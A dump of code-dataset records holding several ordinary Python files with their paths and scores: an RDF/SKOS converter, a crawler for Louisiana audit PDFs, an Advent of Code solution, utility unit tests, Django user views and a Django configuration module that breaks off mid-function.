lang=obj['lang'])
else:
o = Literal(obj['value'])
else:
o = Literal(obj['value'],
datatype=obj['type'])
g.add((s, p, o))
elif isinstance(content[subject][predicate], dict):
if content[subject][predicate]['type'] == 'uri':
o = URIRef(content[subject][predicate]['value'])
elif content[subject][predicate]['type'] == 'literal':
if 'lang' in content[subject][predicate]:
o = Literal(content[subject][predicate]['value'], lang=content[subject][predicate]['lang'])
else:
o = Literal(content[subject][predicate]['value'])
else:
o = Literal(content[subject][predicate]['value'], datatype=content[subject][predicate]['type'])
g.add((s, p, o))
for s, p, o in g.triples((None, None, SKOS.ConceptScheme)):
for _, _, title in g.triples((s, DCTERMS.title, None)):
title = title.toPython()
g.serialize('output/' + title + '.ttl', format='ttl') | pyfusekiutil/convert_rdf_json.py | from rdflib import Graph, URIRef, Namespace, Literal
from rdflib.namespace import FOAF, SKOS, DCTERMS
import requests
import json
links = ['http://onomy.org/published/73/skos',
'http://onomy.org/published/74/skos',
'https://onomy.org/published/83/skos',
'http://onomy.org/published/78/skos',
'http://onomy.org/published/81/skos',
'https://onomy.org/published/84/skos',
'http://onomy.org/published/75/skos',
'http://onomy.org/published/79/skos',
'http://onomy.org/published/72/skos'
]
if __name__ == '__main__':
for i, link in enumerate(links):
response = requests.get(link)
content = json.loads(response.text)
NOM = Namespace('http://onomy.org/onomy-ns#')
g = Graph()
g.bind('foaf', FOAF)
g.bind('onomy', NOM)
g.bind('dcterms', DCTERMS)
g.bind('skos', SKOS)
for subject in content:
s = URIRef(subject)
for predicate in content[subject]:
p = URIRef(predicate)
if isinstance(content[subject][predicate], list):
for obj in content[subject][predicate]:
if obj['type'] == 'uri':
o = URIRef(obj['value'])
elif obj['type'] == 'literal':
if 'lang' in obj:
o = Literal(obj['value'],
lang=obj['lang'])
else:
o = Literal(obj['value'])
else:
o = Literal(obj['value'],
datatype=obj['type'])
g.add((s, p, o))
elif isinstance(content[subject][predicate], dict):
if content[subject][predicate]['type'] == 'uri':
o = URIRef(content[subject][predicate]['value'])
elif content[subject][predicate]['type'] == 'literal':
if 'lang' in content[subject][predicate]:
o = Literal(content[subject][predicate]['value'], lang=content[subject][predicate]['lang'])
else:
o = Literal(content[subject][predicate]['value'])
else:
o = Literal(content[subject][predicate]['value'], datatype=content[subject][predicate]['type'])
g.add((s, p, o))
for s, p, o in g.triples((None, None, SKOS.ConceptScheme)):
for _, _, title in g.triples((s, DCTERMS.title, None)):
title = title.toPython()
g.serialize('output/' + title + '.ttl', format='ttl') | 0.386879 | 0.201656 |
import configparser
from utils import Crawler as CoreCrawler
class Crawler(CoreCrawler):
abbr = 'LA'
def _get_remote_filename(self, local_filename):
if local_filename.startswith('City of '):
directory = 'General Purpose'
name = local_filename.replace('City of ', '')
else:
if 'Inc.' in local_filename or 'Foundation' in local_filename:
directory = 'Non-Profit'
else:
directory = 'Special District'
name = local_filename
filename = '{} {}'.format(self.abbr, name)
return directory, filename
if __name__ == '__main__':
config = configparser.ConfigParser()
config.read('conf.ini')
crawler = Crawler(config, 'loisiana')
crawler.get(config.get('loisiana', 'url').strip())
hrefs_clicked = []
for url in crawler.get_attr('#parishes a', 'href', single=False)[:-1]:
loaded = False
while not loaded:
crawler.get(url)
loaded = True
for box in crawler.get_elements('div.box'):
href = crawler.get_attr('a', 'href', root=box)
if href in hrefs_clicked:
continue
loaded = False
hrefs_clicked.append(href)
crawler.click('a', root=box)
crawler.wait_for_displayed('tr.even')
while True:
for row in crawler.get_elements('tbody tr'):
year = crawler.get_text('.sorting_1', root=row).split('/')[-1]
crawler.download(
crawler.get_attr('a', 'href', root=row),
'{} {}.pdf'.format(crawler.get_text('b', root=row), year)
)
crawler.upload_to_ftp('{} {}.pdf'.format(crawler.get_text('b', root=row), year))
try:
crawler.assert_exists('li.next.disabled')
break
except Exception:
crawler.click('li.next a')
break
crawler.close() | get_LA.py | import configparser
from utils import Crawler as CoreCrawler
class Crawler(CoreCrawler):
abbr = 'LA'
def _get_remote_filename(self, local_filename):
if local_filename.startswith('City of '):
directory = 'General Purpose'
name = local_filename.replace('City of ', '')
else:
if 'Inc.' in local_filename or 'Foundation' in local_filename:
directory = 'Non-Profit'
else:
directory = 'Special District'
name = local_filename
filename = '{} {}'.format(self.abbr, name)
return directory, filename
if __name__ == '__main__':
config = configparser.ConfigParser()
config.read('conf.ini')
crawler = Crawler(config, 'loisiana')
crawler.get(config.get('loisiana', 'url').strip())
hrefs_clicked = []
for url in crawler.get_attr('#parishes a', 'href', single=False)[:-1]:
loaded = False
while not loaded:
crawler.get(url)
loaded = True
for box in crawler.get_elements('div.box'):
href = crawler.get_attr('a', 'href', root=box)
if href in hrefs_clicked:
continue
loaded = False
hrefs_clicked.append(href)
crawler.click('a', root=box)
crawler.wait_for_displayed('tr.even')
while True:
for row in crawler.get_elements('tbody tr'):
year = crawler.get_text('.sorting_1', root=row).split('/')[-1]
crawler.download(
crawler.get_attr('a', 'href', root=row),
'{} {}.pdf'.format(crawler.get_text('b', root=row), year)
)
crawler.upload_to_ftp('{} {}.pdf'.format(crawler.get_text('b', root=row), year))
try:
crawler.assert_exists('li.next.disabled')
break
except Exception:
crawler.click('li.next a')
break
crawler.close() | 0.233532 | 0.053552 |
import sys
from functools import reduce
from typing import Dict, Iterable, List, MutableMapping, Tuple
class Direction:
NORTH: str = "^"
SOUTH: str = "v"
EAST: str = ">"
WEST: str = "<"
def present_to_house(
direction: str,
cur_loc: Tuple[int, int],
visited_house_coordinates: MutableMapping[Tuple[int, int], int],
) -> Tuple[int, int]:
new_loc: Tuple[int, int]
if direction == Direction.NORTH:
# moves north
new_loc = (cur_loc[0], cur_loc[1] + 1)
elif direction == Direction.SOUTH:
# moves south
new_loc = (cur_loc[0], cur_loc[1] - 1)
elif direction == Direction.EAST:
# moves east
new_loc = (cur_loc[0] + 1, cur_loc[1])
elif direction == Direction.WEST:
# moves west
new_loc = (cur_loc[0] - 1, cur_loc[1])
else:
raise ValueError(f"{direction} is not a valid direction")
if new_loc not in visited_house_coordinates:
visited_house_coordinates[new_loc] = 1
else:
visited_house_coordinates[new_loc] += 1
return new_loc
# part 1
def houses_gifted_by_santa(navigation: Iterable[str]) -> int:
visited_house_coordinates: Dict[Tuple[int, int], int] = {(0, 0): 1}
# Moves through the map
reduce(
lambda cur_loc, direction: present_to_house(direction, cur_loc, visited_house_coordinates),
navigation,
(0, 0),
)
return len(visited_house_coordinates.keys())
def is_santas_turn(turn_number: int) -> bool:
return turn_number % 2 == 0
# part 2
def houses_gifted_by_santa_and_robot(navigation: Iterable[str]) -> int:
visited_house_coordinates: Dict[Tuple[int, int], int] = {(0, 0): 2}
santa_cur_loc: Tuple[int, int] = (0, 0)
robot_santa_cur_loc: Tuple[int, int] = (0, 0)
turns: int = 0
# Moves through the map
for direction in navigation:
if is_santas_turn(turns):
santa_cur_loc = present_to_house(direction, santa_cur_loc, visited_house_coordinates)
else:
robot_santa_cur_loc = present_to_house(
direction, robot_santa_cur_loc, visited_house_coordinates
)
turns += 1
return len(visited_house_coordinates.keys())
def main(_: List[str]) -> None:
"""
This is the entry point.
"""
navigation: str = sys.stdin.read().strip()
print(f"Houses with multiple gifts: {houses_gifted_by_santa(navigation)}")
print(f"Houses with multiple gifts: {houses_gifted_by_santa_and_robot(navigation)}")
if __name__ == "__main__":
main(sys.argv) | aoc_2015/day_3/python/day3_puzzle.py | import sys
from functools import reduce
from typing import Dict, Iterable, List, MutableMapping, Tuple
class Direction:
NORTH: str = "^"
SOUTH: str = "v"
EAST: str = ">"
WEST: str = "<"
def present_to_house(
direction: str,
cur_loc: Tuple[int, int],
visited_house_coordinates: MutableMapping[Tuple[int, int], int],
) -> Tuple[int, int]:
new_loc: Tuple[int, int]
if direction == Direction.NORTH:
# moves north
new_loc = (cur_loc[0], cur_loc[1] + 1)
elif direction == Direction.SOUTH:
# moves south
new_loc = (cur_loc[0], cur_loc[1] - 1)
elif direction == Direction.EAST:
# moves east
new_loc = (cur_loc[0] + 1, cur_loc[1])
elif direction == Direction.WEST:
# moves west
new_loc = (cur_loc[0] - 1, cur_loc[1])
else:
raise ValueError(f"{direction} is not a valid direction")
if new_loc not in visited_house_coordinates:
visited_house_coordinates[new_loc] = 1
else:
visited_house_coordinates[new_loc] += 1
return new_loc
# part 1
def houses_gifted_by_santa(navigation: Iterable[str]) -> int:
visited_house_coordinates: Dict[Tuple[int, int], int] = {(0, 0): 1}
# Moves through the map
reduce(
lambda cur_loc, direction: present_to_house(direction, cur_loc, visited_house_coordinates),
navigation,
(0, 0),
)
return len(visited_house_coordinates.keys())
def is_santas_turn(turn_number: int) -> bool:
return turn_number % 2 == 0
# part 2
def houses_gifted_by_santa_and_robot(navigation: Iterable[str]) -> int:
visited_house_coordinates: Dict[Tuple[int, int], int] = {(0, 0): 2}
santa_cur_loc: Tuple[int, int] = (0, 0)
robot_santa_cur_loc: Tuple[int, int] = (0, 0)
turns: int = 0
# Moves through the map
for direction in navigation:
if is_santas_turn(turns):
santa_cur_loc = present_to_house(direction, santa_cur_loc, visited_house_coordinates)
else:
robot_santa_cur_loc = present_to_house(
direction, robot_santa_cur_loc, visited_house_coordinates
)
turns += 1
return len(visited_house_coordinates.keys())
def main(_: List[str]) -> None:
"""
This is the entry point.
"""
navigation: str = sys.stdin.read().strip()
print(f"Houses with multiple gifts: {houses_gifted_by_santa(navigation)}")
print(f"Houses with multiple gifts: {houses_gifted_by_santa_and_robot(navigation)}")
if __name__ == "__main__":
main(sys.argv) | 0.534127 | 0.368463 |
import unittest
from binx.utils import bfs_shortest_path, ObjUtils, RecordUtils, DataFrameDtypeConversion
import pandas as pd
from pandas.testing import assert_frame_equal
import numpy as np
from marshmallow import fields
from datetime import datetime, date
class TestUtils(unittest.TestCase):
def setUp(self):
self.objutils = ObjUtils()
self.recordutils = RecordUtils()
self.dfconv = DataFrameDtypeConversion()
def test_record_utils_replace_nan_with_none(self):
records = [
{'a': 1,'b':2},
{'a': np.nan,'b':3},
{'a': 4,'b': np.nan}
]
test = [
{'a': 1,'b':2},
{'a': None,'b':3},
{'a': 4,'b': None}
]
r = self.recordutils.replace_nan_with_none(records)
self.assertEqual(r, test)
def test_record_utils_columns_to_records(self):
cols = {'a': [1,2], 'b': [3,4]}
test = [
{'a':1, 'b':3},
{'a':2, 'b':4}
]
r = self.recordutils.columns_to_records(cols)
self.assertEqual(test, r)
def test_record_utils_records_to_columns(self):
records = [
{'a':1, 'b':3},
{'a':2, 'b':4}
]
test = {'a': [1,2], 'b': [3,4]}
c = self.recordutils.records_to_columns(records)
self.assertEqual(test, c)
def test_obj_util_get_fully_qualified_path(self):
class Test:
pass
t = Test()
clspath = self.objutils.get_fully_qualified_path(t)
self.assertEqual('tests.test_utils.Test', clspath)
def test_dfconv_df_nan_to_none(self):
df = pd.DataFrame({'a':[1, np.nan], 'b':[2,np.nan]})
test = pd.DataFrame({'a':[1, None], 'b':[2,None]})
d = self.dfconv.df_nan_to_none(df)
assert_frame_equal(d, test, check_dtype=False)
def test_dfconv_df_none_to_nan(self):
df = pd.DataFrame({'a':[1, None], 'b':[2,None]})
test = pd.DataFrame({'a':[1, np.nan], 'b':[2,np.nan]})
d = self.dfconv.df_none_to_nan(df)
assert_frame_equal(test, d)
def test_bfs_shortest_path(self):
graph = {
'A': set(['B', 'C']),
'B': set(['A', 'D', 'E']),
'C': set(['A', 'F']),
'D': set(['B']),
'E': set(['B', 'F']),
'F': set(['C', 'E'])
}
test = ['A', 'C', 'F']
result = bfs_shortest_path(graph, 'A', 'F')
self.assertEqual(test, result)
test = ['A', 'B', 'D']
result = bfs_shortest_path(graph, 'A', 'D')
self.assertEqual(result, test)
def test_dfconv_date_to_string(self):
# note that only datetime objects get converted to pd.Timestamps.
# datetime.date objects are loaded in as type object not type pd.TimeStamp
records = [
{'a': 1, 'b': datetime(2017,5,4, 10, 10, 10), 'c': datetime(2017,5,4)},
{'a': 2, 'b': datetime(2017,6,4, 10, 10, 10), 'c': datetime(2018,5,4)},
{'a': 3, 'b': datetime(2017,7,4, 10, 10, 10), 'c': datetime(2019,5,4)},
]
col_mapping = {'b': '%Y-%m-%d %H:%M:%S', 'c': '%Y-%m-%d'}
df = pd.DataFrame.from_records(records)
test_recs = self.dfconv.date_to_string(col_mapping, df)
self.assertEqual(str(test_recs['b'].dtype), 'object')
self.assertEqual(str(test_recs['c'].dtype), 'object')
def test_record_util_date_to_string(self):
records = [
{'a': 1, 'b': datetime(2017,5,4, 10, 10, 10), 'c': date(2017,5,4)},
]
col_mapping = {'b': '%Y-%m-%d %H:%M:%S', 'c': '%Y-%m-%d'}
test = [{'a': 1, 'b': '2017-05-04 10:10:10', 'c': '2017-05-04'}]
test_recs = self.recordutils.date_to_string(col_mapping, records)
self.assertListEqual(test, test_recs)
def test_record_util_date_to_string_with_numpy_and_pandas(self):
records = [
{'a': 1, 'b': pd.Timestamp(2017,5,4, 10, 10, 10), 'c': np.datetime64('2017-05-04')},
]
col_mapping = {'b': '%Y-%m-%d %H:%M:%S', 'c': '%Y-%m-%d'}
test = [{'a': 1, 'b': '2017-05-04 10:10:10', 'c': '2017-05-04'}]
test_recs = self.recordutils.date_to_string(col_mapping, records)
self.assertListEqual(test, test_recs) | tests/test_utils.py | import unittest
from binx.utils import bfs_shortest_path, ObjUtils, RecordUtils, DataFrameDtypeConversion
import pandas as pd
from pandas.testing import assert_frame_equal
import numpy as np
from marshmallow import fields
from datetime import datetime, date
class TestUtils(unittest.TestCase):
def setUp(self):
self.objutils = ObjUtils()
self.recordutils = RecordUtils()
self.dfconv = DataFrameDtypeConversion()
def test_record_utils_replace_nan_with_none(self):
records = [
{'a': 1,'b':2},
{'a': np.nan,'b':3},
{'a': 4,'b': np.nan}
]
test = [
{'a': 1,'b':2},
{'a': None,'b':3},
{'a': 4,'b': None}
]
r = self.recordutils.replace_nan_with_none(records)
self.assertEqual(r, test)
def test_record_utils_columns_to_records(self):
cols = {'a': [1,2], 'b': [3,4]}
test = [
{'a':1, 'b':3},
{'a':2, 'b':4}
]
r = self.recordutils.columns_to_records(cols)
self.assertEqual(test, r)
def test_record_utils_records_to_columns(self):
records = [
{'a':1, 'b':3},
{'a':2, 'b':4}
]
test = {'a': [1,2], 'b': [3,4]}
c = self.recordutils.records_to_columns(records)
self.assertEqual(test, c)
def test_obj_util_get_fully_qualified_path(self):
class Test:
pass
t = Test()
clspath = self.objutils.get_fully_qualified_path(t)
self.assertEqual('tests.test_utils.Test', clspath)
def test_dfconv_df_nan_to_none(self):
df = pd.DataFrame({'a':[1, np.nan], 'b':[2,np.nan]})
test = pd.DataFrame({'a':[1, None], 'b':[2,None]})
d = self.dfconv.df_nan_to_none(df)
assert_frame_equal(d, test, check_dtype=False)
def test_dfconv_df_none_to_nan(self):
df = pd.DataFrame({'a':[1, None], 'b':[2,None]})
test = pd.DataFrame({'a':[1, np.nan], 'b':[2,np.nan]})
d = self.dfconv.df_none_to_nan(df)
assert_frame_equal(test, d)
def test_bfs_shortest_path(self):
graph = {
'A': set(['B', 'C']),
'B': set(['A', 'D', 'E']),
'C': set(['A', 'F']),
'D': set(['B']),
'E': set(['B', 'F']),
'F': set(['C', 'E'])
}
test = ['A', 'C', 'F']
result = bfs_shortest_path(graph, 'A', 'F')
self.assertEqual(test, result)
test = ['A', 'B', 'D']
result = bfs_shortest_path(graph, 'A', 'D')
self.assertEqual(result, test)
def test_dfconv_date_to_string(self):
# note that only datetime objects get converted to pd.Timestamps.
# datetime.date objects are loaded in as type object not type pd.TimeStamp
records = [
{'a': 1, 'b': datetime(2017,5,4, 10, 10, 10), 'c': datetime(2017,5,4)},
{'a': 2, 'b': datetime(2017,6,4, 10, 10, 10), 'c': datetime(2018,5,4)},
{'a': 3, 'b': datetime(2017,7,4, 10, 10, 10), 'c': datetime(2019,5,4)},
]
col_mapping = {'b': '%Y-%m-%d %H:%M:%S', 'c': '%Y-%m-%d'}
df = pd.DataFrame.from_records(records)
test_recs = self.dfconv.date_to_string(col_mapping, df)
self.assertEqual(str(test_recs['b'].dtype), 'object')
self.assertEqual(str(test_recs['c'].dtype), 'object')
def test_record_util_date_to_string(self):
records = [
{'a': 1, 'b': datetime(2017,5,4, 10, 10, 10), 'c': date(2017,5,4)},
]
col_mapping = {'b': '%Y-%m-%d %H:%M:%S', 'c': '%Y-%m-%d'}
test = [{'a': 1, 'b': '2017-05-04 10:10:10', 'c': '2017-05-04'}]
test_recs = self.recordutils.date_to_string(col_mapping, records)
self.assertListEqual(test, test_recs)
def test_record_util_date_to_string_with_numpy_and_pandas(self):
records = [
{'a': 1, 'b': pd.Timestamp(2017,5,4, 10, 10, 10), 'c': np.datetime64('2017-05-04')},
]
col_mapping = {'b': '%Y-%m-%d %H:%M:%S', 'c': '%Y-%m-%d'}
test = [{'a': 1, 'b': '2017-05-04 10:10:10', 'c': '2017-05-04'}]
test_recs = self.recordutils.date_to_string(col_mapping, records)
self.assertListEqual(test, test_recs) | 0.435661 | 0.644854 |
from multiprocessing import context
from django.shortcuts import render,redirect
from django.contrib.auth import login, authenticate,logout
from django.contrib.auth.models import User
from .models import Profile
from django.contrib import messages
from django.contrib.auth.decorators import login_required
from .forms import UserCreationForm, ProfileForm
# Create your views here.
def loginUser(request):
page = 'login'
if request.user.is_authenticated:
return redirect('profiles')
if request.method=='POST':
username=request.POST['username']
password=request.POST['password']
try:
user=User.objects.get(username=username)
except:
messages.error(request, 'Username does not exist')
user=authenticate(request,username=username,password=password)
if user is not None:
login(request,user)
return redirect('profiles')
else:
messages.error(request,'username OR password is incorrect')
return render(request, 'users/login_register.html')
def logoutUser(request):
logout(request)
messages.info(request, 'user was successfully logged out')
return redirect('login')
def registerUser(request):
page = 'register'
form = UserCreationForm()
if request.method=='POST':
form =UserCreationForm(request.POST)
if form.is_valid():
form.save()
user = form.save(commit=False)
user.username=user.username.lower()
user.save
messages.success(request,'user account wa created successfully')
login(request,user)
return redirect('profiles')
else:
messages.success(request,'An error has occurred during registration')
context= {'page':page, 'form':form}
return render(request, 'users/login_register.html',context)
def profiles(request):
profiles = Profile.objects.all()
context = {'profiles':profiles }
return render(request, 'users/profiles.html', context)
def userProfile(request,pk):
profile = Profile.objects.get(id=pk)
topSkills =profile.skill_set.exclude(description__exact="")
otherSkills = profile.skill_set.filter(description="")
context={'profile':profile, 'topSkills':topSkills, 'otherSkills':otherSkills}
return render(request, 'users/user-profile.html',context)
@login_required(login_url='login')
def UserAccount(request):
profile =request.user.profile
skills =profile.skill_set.all()
projects=profile.project_set.all()
context = {'profile':profile,'skills':skills,'projects':projects}
return render(request,'users/account.html',context)
@login_required(login_url='login')
def editAccount(request):
form = ProfileForm()
context={'form':form}
return render(request, 'users/profile_form.html', context) | users/views.py | from multiprocessing import context
from django.shortcuts import render,redirect
from django.contrib.auth import login, authenticate,logout
from django.contrib.auth.models import User
from .models import Profile
from django.contrib import messages
from django.contrib.auth.decorators import login_required
from .forms import UserCreationForm, ProfileForm
# Create your views here.
def loginUser(request):
page = 'login'
if request.user.is_authenticated:
return redirect('profiles')
if request.method=='POST':
username=request.POST['username']
password=request.POST['password']
try:
user=User.objects.get(username=username)
except:
messages.error(request, 'Username does not exist')
user=authenticate(request,username=username,password=password)
if user is not None:
login(request,user)
return redirect('profiles')
else:
messages.error(request,'username OR password is incorrect')
return render(request, 'users/login_register.html')
def logoutUser(request):
logout(request)
messages.info(request, 'user was successfully logged out')
return redirect('login')
def registerUser(request):
page = 'register'
form = UserCreationForm()
if request.method=='POST':
form =UserCreationForm(request.POST)
if form.is_valid():
form.save()
user = form.save(commit=False)
user.username=user.username.lower()
user.save
messages.success(request,'user account wa created successfully')
login(request,user)
return redirect('profiles')
else:
messages.success(request,'An error has occurred during registration')
context= {'page':page, 'form':form}
return render(request, 'users/login_register.html',context)
def profiles(request):
profiles = Profile.objects.all()
context = {'profiles':profiles }
return render(request, 'users/profiles.html', context)
def userProfile(request,pk):
profile = Profile.objects.get(id=pk)
topSkills =profile.skill_set.exclude(description__exact="")
otherSkills = profile.skill_set.filter(description="")
context={'profile':profile, 'topSkills':topSkills, 'otherSkills':otherSkills}
return render(request, 'users/user-profile.html',context)
@login_required(login_url='login')
def UserAccount(request):
profile =request.user.profile
skills =profile.skill_set.all()
projects=profile.project_set.all()
context = {'profile':profile,'skills':skills,'projects':projects}
return render(request,'users/account.html',context)
@login_required(login_url='login')
def editAccount(request):
form = ProfileForm()
context={'form':form}
return render(request, 'users/profile_form.html', context) | 0.334481 | 0.059183 |
import os
import sys
import enum
import textwrap
from cryptography.fernet import Fernet
import environ
from environ._environ_config import _env_to_bool
def split_by_comma(value):
return tuple(e.strip() for e in value.split(","))
@environ.config(prefix="")
class NoeConfig:
debug = environ.bool_var(
default=False, name="DJANGO_DEBUG", help="SECURITY WARNING: Don't run with debug turned on in production!"
)
secret_key = environ.var(help="SECURITY WARNING: keep the secret key used in production secret!")
frontend_url = environ.var(help="Where the React frontend SPA is hosted")
backend_url = environ.var(help="Where the Django backend is hosted")
allowed_hosts = environ.var(default="*", converter=split_by_comma)
allowed_cors_hosts = environ.var(default=None, converter=lambda val: split_by_comma(val) if val else None)
behind_tls_proxy = environ.bool_var(
default=False,
help='Whether or not to set the "X-Forwarded-Proto" header to "https". Should be set to True behind a proxy.',
)
language_code = environ.var(default="hu-hu")
time_zone = environ.var(default="Europe/Budapest")
log_level = environ.var(default="INFO", help="Python logger log level")
sentry_dsn_url = environ.var(
default=None, name="SENTRY_DSN_URL", help="If you want to track exceptions with https://sentry.io",
)
@environ.config
class Database:
_DB_SQLITE_ENGINE = "django.db.backends.sqlite3"
_PARAM_HELP = "Not required for SQLite"
def _convert_database_engine(value):
if value == "postgresql":
return "django.db.backends.postgresql"
elif value in ("mysql", "mariadb"):
return "django.db.backends.mysql"
elif value in ("sqlite", "sqlite3"):
return NoeConfig.Database._DB_SQLITE_ENGINE
raise ValueError(
f'Invalid database engine: {value!r}\npossible values: "postgresql", "mysql", "mariadb", "sqlite"'
)
def _validate_param(obj, attribute, value):
if not value and obj.engine != NoeConfig.Database._DB_SQLITE_ENGINE:
raise ValueError(
f"The DJANGO_DATABASE_{attribute.name.upper()} environment variable is required\n{attribute!r}"
)
engine = environ.var(converter=_convert_database_engine)
name = environ.var()
user = environ.var(default=None, validator=_validate_param, help=_PARAM_HELP)
password = environ.var(default=None, validator=_validate_param, help=_PARAM_HELP)
host = environ.var(default=None, validator=_validate_param, help=_PARAM_HELP)
port = environ.var(default=None, validator=_validate_param, help=_PARAM_HELP)
database = environ.group(Database)
@environ.config
class Email:
class Backend(enum.Enum):
CONSOLE = "console"
SMTP = "smtp"
_PARAM_HELP = "Required for SMTP only"
def _convert_backend(value):
backend = NoeConfig.Email.Backend(value)
return f"django.core.mail.backends.{backend.value}.EmailBackend"
def _validate_param(obj, attribute, value):
if not value and obj.backend == "smtp":
raise ValueError(
f"The DJANGO_DATABASE_{attribute.name.upper()} environment variable is required\n{attribute!r}"
)
def _convert_verification_key(value):
if value is None:
raise ValueError("You need to generate an EMAIL_VERIFICATION_KEY.")
value_bytes = value.encode()
try:
Fernet(value_bytes)
except Exception as exc:
raise ValueError(f"EMAIL_VERIFICATION_KEY: {value}")
else:
return value_bytes
backend = environ.var(converter=_convert_backend, help='"console" or "smtp"')
host = environ.var(default=None, help=_PARAM_HELP)
port = environ.var(default=None, help=_PARAM_HELP)
user = environ.var(default=None, help=_PARAM_HELP)
password = environ.var(default=None, help=_PARAM_HELP)
use_tls = environ.bool_var(default=True)
default_from = environ.bool_var(help="Sender email address for automatic emails")
verification_key = environ.var(
default=None,
converter=_convert_verification_key,
help="SECRET_KEY for encrpyting the email verification token",
)
email = environ.group(Email)
@environ.config
class Static:
url = environ.var(
default="/static/",
help=(
"URL path generated for static files. "
"If you change this, backend won't serve static files with WhiteNoise anymore."
),
)
root = environ.var(
default="/project_noe/static_root",
help=(
"Where manage.py collectstatic put all static files. "
"The default value is where the static files are in the Docker container"
),
)
static = environ.group(Static)
default_time_slot_capacity = environ.var(default=30, converter=int)
@environ.config
class Szamlazzhu:
agent_key = environ.var()
invoice_prefix = environ.var()
szamlazzhu = environ.group(Szamlazzhu)
@environ.config
class SimplePay:
class Environment(enum.Enum):
SANDBOX = "sandbox"
LIVE = "live"
merchant = environ.var()
secret_key = environ.var()
ipn_url = environ.var()
use_live = environ.var(default=False)
environment = environ.var(name="SIMPLEPAY_ENVIRONMENT", converter=Environment)
def __attrs_post_init__(self):
self.use_live = self.environment is NoeConfig.SimplePay.Environment.LIVE
simplepay = environ.group(SimplePay)
def __attrs_post_init__(self):
if not self.allowed_cors_hosts and "*" not in self.allowed_hosts:
self.allowed_cors_hosts = self.allowed_hosts
def print_config_schema():
print("Possible configuration environment variables:")
config_schema = NoeConfig.generate_help(display_defaults=True)
for line in config_schema.splitlines():
# Workaround for wrongly generated variable names
print("-", line.lstrip("_"))
_django_debug = os.environ.get("DJANGO_DEBUG", False)
# bootstrapping is hard. environ-config can't handle this use-case
if _env_to_bool(_django_debug):
# The dotenv package is installed only in a dev environment
from dotenv import load_dotenv
print("Loading environment variables from .env file")
print()
load_dotenv()
try:
config = NoeConfig.from_environ()
except Exception as exc:
print_config_schema()
print()
print("Error during loading environment variable:")
exc_message = f"{exc.__class__.__name__}: {exc}"
print(textwrap.indent(exc_message, " "))
sys.exit(1) | code/backend/project_noe/config.py | import os
import sys
import enum
import textwrap
from cryptography.fernet import Fernet
import environ
from environ._environ_config import _env_to_bool
def split_by_comma(value):
return tuple(e.strip() for e in value.split(","))
@environ.config(prefix="")
class NoeConfig:
debug = environ.bool_var(
default=False, name="DJANGO_DEBUG", help="SECURITY WARNING: Don't run with debug turned on in production!"
)
secret_key = environ.var(help="SECURITY WARNING: keep the secret key used in production secret!")
frontend_url = environ.var(help="Where the React frontend SPA is hosted")
backend_url = environ.var(help="Where the Django backend is hosted")
allowed_hosts = environ.var(default="*", converter=split_by_comma)
allowed_cors_hosts = environ.var(default=None, converter=lambda val: split_by_comma(val) if val else None)
behind_tls_proxy = environ.bool_var(
default=False,
help='Whether or not to set the "X-Forwarded-Proto" header to "https". Should be set to True behind a proxy.',
)
language_code = environ.var(default="hu-hu")
time_zone = environ.var(default="Europe/Budapest")
log_level = environ.var(default="INFO", help="Python logger log level")
sentry_dsn_url = environ.var(
default=None, name="SENTRY_DSN_URL", help="If you want to track exceptions with https://sentry.io",
)
@environ.config
class Database:
_DB_SQLITE_ENGINE = "django.db.backends.sqlite3"
_PARAM_HELP = "Not required for SQLite"
def _convert_database_engine(value):
if value == "postgresql":
return "django.db.backends.postgresql"
elif value in ("mysql", "mariadb"):
return "django.db.backends.mysql"
elif value in ("sqlite", "sqlite3"):
return NoeConfig.Database._DB_SQLITE_ENGINE
raise ValueError(
f'Invalid database engine: {value!r}\npossible values: "postgresql", "mysql", "mariadb", "sqlite"'
)
def _validate_param(obj, attribute, value):
if not value and obj.engine != NoeConfig.Database._DB_SQLITE_ENGINE:
raise ValueError(
f"The DJANGO_DATABASE_{attribute.name.upper()} environment variable is required\n{attribute!r}"
)
engine = environ.var(converter=_convert_database_engine)
name = environ.var()
user = environ.var(default=None, validator=_validate_param, help=_PARAM_HELP)
password = environ.var(default=None, validator=_validate_param, help=_PARAM_HELP)
host = environ.var(default=None, validator=_validate_param, help=_PARAM_HELP)
port = environ.var(default=None, validator=_validate_param, help=_PARAM_HELP)
database = environ.group(Database)
@environ.config
class Email:
class Backend(enum.Enum):
CONSOLE = "console"
SMTP = "smtp"
_PARAM_HELP = "Required for SMTP only"
def _convert_backend(value):
backend = NoeConfig.Email.Backend(value)
return f"django.core.mail.backends.{backend.value}.EmailBackend"
def _validate_param(obj, attribute, value):
if not value and obj.backend == "smtp":
raise ValueError(
f"The DJANGO_DATABASE_{attribute.name.upper()} environment variable is required\n{attribute!r}"
)
def _convert_verification_key(value):
if value is None:
raise ValueError("You need to generate an EMAIL_VERIFICATION_KEY.")
value_bytes = value.encode()
try:
Fernet(value_bytes)
except Exception as exc:
raise ValueError(f"EMAIL_VERIFICATION_KEY: {value}")
else:
return value_bytes
backend = environ.var(converter=_convert_backend, help='"console" or "smtp"')
host = environ.var(default=None, help=_PARAM_HELP)
port = environ.var(default=None, help=_PARAM_HELP)
user = environ.var(default=None, help=_PARAM_HELP)
password = environ.var(default=None, help=_PARAM_HELP)
use_tls = environ.bool_var(default=True)
default_from = environ.bool_var(help="Sender email address for automatic emails")
verification_key = environ.var(
default=None,
converter=_convert_verification_key,
help="SECRET_KEY for encrpyting the email verification token",
)
email = environ.group(Email)
@environ.config
class Static:
url = environ.var(
default="/static/",
help=(
"URL path generated for static files. "
"If you change this, backend won't serve static files with WhiteNoise anymore."
),
)
root = environ.var(
default="/project_noe/static_root",
help=(
"Where manage.py collectstatic put all static files. "
"The default value is where the static files are in the Docker container"
),
)
static = environ.group(Static)
default_time_slot_capacity = environ.var(default=30, converter=int)
@environ.config
class Szamlazzhu:
agent_key = environ.var()
invoice_prefix = environ.var()
szamlazzhu = environ.group(Szamlazzhu)
@environ.config
class SimplePay:
class Environment(enum.Enum):
SANDBOX = "sandbox"
LIVE = "live"
merchant = environ.var()
secret_key = environ.var()
ipn_url = environ.var()
use_live = environ.var(default=False)
environment = environ.var(name="SIMPLEPAY_ENVIRONMENT", converter=Environment)
def __attrs_post_init__(self):
self.use_live = self.environment is NoeConfig.SimplePay.Environment.LIVE
simplepay = environ.group(SimplePay)
def __attrs_post_init__(self):
if not self.allowed_cors_hosts and "*" not in self.allowed_hosts:
self.allowed_cors_hosts = self.allowed_hosts
def print_config_schema():
print("Possible configuration environment variables:")
config_schema = NoeConfig.generate_help(display_defaults=True)
for line in config_schema.splitlines():
# Workaround for wrongly generated variable names
